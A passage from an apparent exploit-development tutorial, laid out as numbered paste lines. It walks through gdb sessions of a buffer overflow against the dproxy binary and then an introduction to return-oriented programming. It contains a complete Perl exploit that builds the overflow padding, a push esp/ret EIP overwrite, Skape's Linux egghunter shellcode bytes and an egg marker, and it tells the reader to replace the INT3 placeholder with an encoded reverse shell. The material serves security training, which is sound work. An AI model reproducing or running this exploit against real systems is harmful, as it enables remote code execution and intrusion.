  1552. Core was generated by `/usr/local/sbin/dproxy'.
  1553. Program terminated with signal 5, Trace/breakpoint trap.
  1554. #0 0xbf9c7c01 in ?? ()
  1555.  
  1556. ---------------------------Type This-----------------------------------
  1557.  
  1558. (gdb) info registers
  1559. -----------------------------------------------------------------------
  1560.  
  1561. eax 0xbf9c8c40 0xbf9c8c40
  1562. ecx 0x184f 0x184f
  1563. edx 0xbf9c7df5 0xbf9c7df5
  1564. ebx 0x41414141 0x41414141
  1565. esp 0xbf9c7c00 0xbf9c7c00
  1566. ebp 0x41414141 0x41414141
  1567. esi 0x41414141 0x41414141
  1568. edi 0xbf9c8c40 0xbf9c8c40
  1569. eip 0xbf9c7c01 0xbf9c7c01
  1570.  
  1571. ---------------------------Type This-----------------------------------
  1572.  
  1573. (gdb) x/64x $eip
  1574. -----------------------------------------------------------------------
  1575.  
  1576. 0xbf9c7c01: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1577. 0xbf9c7c11: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1578. 0xbf9c7c21: 0xcccccccc 0xcccccccc 0xcccccccc 0x2e2ecccc
  1579. 0xbf9c7c31: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1580. 0xbf9c7c41: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1581. 0xbf9c7c51: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1582. 0xbf9c7c61: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1583. 0xbf9c7c71: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1584. 0xbf9c7c81: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1585.  
  1586.  
  1587. USING THE EGGHUNTER - DPROXY5
  1588.  
  1589.  
  1590. [AAAAAAAA.AAAAAA.AAAAAA....AAAA][ JMP ESP ][ EGGHUNTER NOP NOP NOP | <---truncated
  1591. | |
  1592. 2073 ESP (2077)
  1593.  
  1594.  
  1595. [AAAAAAAA.AAAAAA.AAAAAA....AAAA][ JMP ESP ][ EGGHUNTER NOP NOP NOP ... NOP NOP 50905090 50905090 SHELLCODE ]
  1596.  
  1597. --------------------------------------old perl version of the code------------------------------------------------------
  1598. # taken from Skape's paper
  1599. $linux_egghunter =
  1600. "\xBB\x90\x50\x90\x50". # mov ebx, 0x50905090 <-- this is the EGG
  1601. "\x31\xC9". # xor ecx,ecx
  1602. "\xF7\xE1". # mul ecx
  1603. "\x66\x81\xCA\xFF\x0F". # or dx,0xfff
  1604. "\x42". # inc edx
  1605. "\x60". # pusha
  1606. "\x8D\x5A\x04". # lea ebx,[edx+0x4]
  1607. "\xB0\x21". # mov al,0x21
  1608. "\xCD\x80". # int 0x80
  1609. "\x3C\xF2". # cmp al,0xf2
  1610. "\x61". # popa
  1611. "\x74\xED". # jz 0x9
  1612. "\x39\x1A". # cmp [edx],ebx
  1613. "\x75\xEE". # jnz 0xe
  1614. "\x39\x5A\x04". # cmp [edx+0x4],ebx
  1615. "\x75\xE9". # jnz 0xe
  1616. "\xFF\xE2"; # jmp edx
  1617.  
  1618. # when you need to use it, use the following EGG:
  1619. $egg = "\x50\x90\x50\x90\x50\x90\x50\x90";
  1620.  
  1621. $shellcode = "\xCC" x 500;
  1622.  
  1623. $nops = "\x90" x 100; # 100 NOPS to place between egghunter and shellcode
  1624.  
  1625. $buf .= "A" x $distance_to_eip;
  1626. $buf .= pack("V", $eip);
  1627. $buf .= $linux_egghunter;
  1628. $buf .= $nops;
  1629. $buf .= $egg;
  1630. $buf .= $shellcode;
  1631. --------------------------------------old perl version of the code------------------------------------------------------
  1632.  
  1633.  
  1634. Failed to read a valid object file image from memory.
  1635. Core was generated by `/usr/local/sbin/dproxy'.
  1636. Program terminated with signal 5, Trace/breakpoint trap.
  1637. #0 0xbf9c84d1 in ?? ()
  1638.  
  1639. ---------------------------Type This-----------------------------------
  1640.  
  1641. (gdb) x/64x $eip
  1642. -----------------------------------------------------------------------
  1643.  
  1644. 0xbf9c84d1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1645. 0xbf9c84e1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1646. 0xbf9c84f1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1647. 0xbf9c8501: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1648. 0xbf9c8511: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1649. 0xbf9c8521: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1650. 0xbf9c8531: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1651. 0xbf9c8541: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1652. 0xbf9c8551: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1653. 0xbf9c8561: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1654. 0xbf9c8571: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1655. 0xbf9c8581: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1656. 0xbf9c8591: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1657. 0xbf9c85a1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1658. 0xbf9c85b1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1659. 0xbf9c85c1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1660.  
  1661. REPLACE THE INT3 SHELLCODE WITH ALPHA2 ENCODED LINUX IA32 REVERSE SHELL
  1662.  
  1663. EXPLOIT WHICH REACHES INT3
  1664. --------------------------------------old perl version of the code------------------------------------------------------
  1665. #!/usr/bin/perl
  1666.  
  1667. binmode(STDOUT);
  1668.  
  1669. $| = 1; # turn off output buffering
  1670.  
  1671. $distance_to_eip = 2073; # replace this with distance to EIP
  1672. $eip = 0x0804a7ca; # push esp; ret - dproxy binary
  1673.  
  1674. # taken from Skape's paper
  1675. $linux_egghunter =
  1676. "\xBB\x90\x50\x90\x50". # mov ebx, 0x50905090 <-- this is the EGG
  1677. "\x31\xC9". # xor ecx,ecx
  1678. "\xF7\xE1". # mul ecx
  1679. "\x66\x81\xCA\xFF\x0F". # or dx,0xfff
  1680. "\x42". # inc edx
  1681. "\x60". # pusha
  1682. "\x8D\x5A\x04". # lea ebx,[edx+0x4]
  1683. "\xB0\x21". # mov al,0x21
  1684. "\xCD\x80". # int 0x80
  1685. "\x3C\xF2". # cmp al,0xf2
  1686. "\x61". # popa
  1687. "\x74\xED". # jz 0x9
  1688. "\x39\x1A". # cmp [edx],ebx
  1689. "\x75\xEE". # jnz 0xe
  1690. "\x39\x5A\x04". # cmp [edx+0x4],ebx
  1691. "\x75\xE9". # jnz 0xe
  1692. "\xFF\xE2"; # jmp edx
  1693.  
  1694. # when you need to use it, use the following EGG:
  1695. $egg = "\x50\x90\x50\x90\x50\x90\x50\x90";
  1696.  
  1697. $shellcode = "\xCC" x 500;
  1698.  
  1699. $nops = "\x90" x 100; # 100 NOPS to place between egghunter and shellcode
  1700.  
  1701. $buf .= "A" x $distance_to_eip;
  1702. $buf .= pack("V", $eip);
  1703. $buf .= $linux_egghunter;
  1704. $buf .= $nops;
  1705. $buf .= $egg;
  1706. $buf .= $shellcode;
  1707.  
  1708. print $buf;
  1709. --------------------------------------old perl version of the code------------------------------------------------------
  1710.  
  1711.  
  1712.  
  1713. ###############################################
  1714. # Introduction to Return Oriented Programming #
  1715. ###############################################
  1716.  
  1717. ---------------------------Type This-----------------------------------
  1718.  
  1719. victim2.c
  1720. ---------
  1721. make victim2
  1722. ./victim2 AAAAAAAAAAAAA
  1723.  
  1724. gdb victim2
  1725. disassemble main
  1726. -----------------------------------------------------------------------
  1727.  
  1728. 0x080483c7 <+31>: push 0x4
  1729. 0x080483c9 <+33>: push 0x3
  1730. 0x080483cb <+35>: call 0x8048426 <add>
  1731.  
  1732. We want to set a breakpoint in main() just before add is called.
  1733. We want to inspect the calling frame for add():
  1734.  
  1735. break *0x080483cb
  1736.  
  1737. run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  1738.  
  1739. We are in main()
  1740. - just before call add()
  1741. - we want to look at the stack
  1742.  
  1743. In GDB, you can find out the stack trace by the following commands:
  1744. where
  1745. backtrace
  1746. bt
  1747. ---------------------------Type This-----------------------------------
  1748.  
  1749. (gdb) x/i $eip
  1750. -----------------------------------------------------------------------
  1751.  
  1752. => 0x80483cb <main+35>: call 0x8048426 <add>
  1753.  
  1754. ---------------------------Type This-----------------------------------
  1755.  
  1756. (gdb) x/64x $esp
  1757. -----------------------------------------------------------------------
  1758.  
  1759. 0xbffffa60: 0x00000003 0x00000004 0xbffffa88 0x0804846b
  1760. ^^^^^^^^^^params^^^^^^^^^^
  1761.  
  1762. stepi <------ single step
  1763. where
  1764.  
  1765. ---------------------------Type This-----------------------------------
  1766.  
  1767. (gdb) where
  1768. -----------------------------------------------------------------------
  1769.  
  1770. #0 0x08048426 in add ()
  1771. #1 0x080483d0 in main ()
  1772.  
  1773. ---------------------------Type This-----------------------------------
  1774.  
  1775. (gdb) x/64x $esp
  1776. -----------------------------------------------------------------------
  1777.  
  1778. 0xbffffa5c: 0x080483d0 0x00000003 0x00000004 0xbffffa88
  1779. ^^^^^^^^^^ ^^^^^^^^^^ ^^^^^^^^^^
  1780. saved return param param
  1781. address (from
  1782. add)
  1783.  
  1784. THIS IS THE CALLING FRAME FOR add(3, 4)
  1785.  
  1786. ---------------------------Type This-----------------------------------
  1787.  
  1788. export EGG=`./frame1.py`
  1789. gdb victim2
  1790. (gdb) run $EGG
  1791. -----------------------------------------------------------------------
  1792.  
  1793. 0x80484a5 <__libc_csu_init+85>: pop ebx
  1794. 0x80484a6 <__libc_csu_init+86>: pop esi
  1795. 0x80484a7 <__libc_csu_init+87>: pop edi <------ POP/POP/RET
  1796. 0x80484a8 <__libc_csu_init+88>: pop ebp
  1797. 0x80484a9 <__libc_csu_init+89>: ret
  1798.  
  1799. ---------------------------Type This-----------------------------------
  1800.  
  1801. export EGG=`./frame2.py`
  1802. gdb victim2
  1803. run $EGG
  1804. -----------------------------------------------------------------------
  1805.  
  1806.  
  1807. x/100i 0x080483a8
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement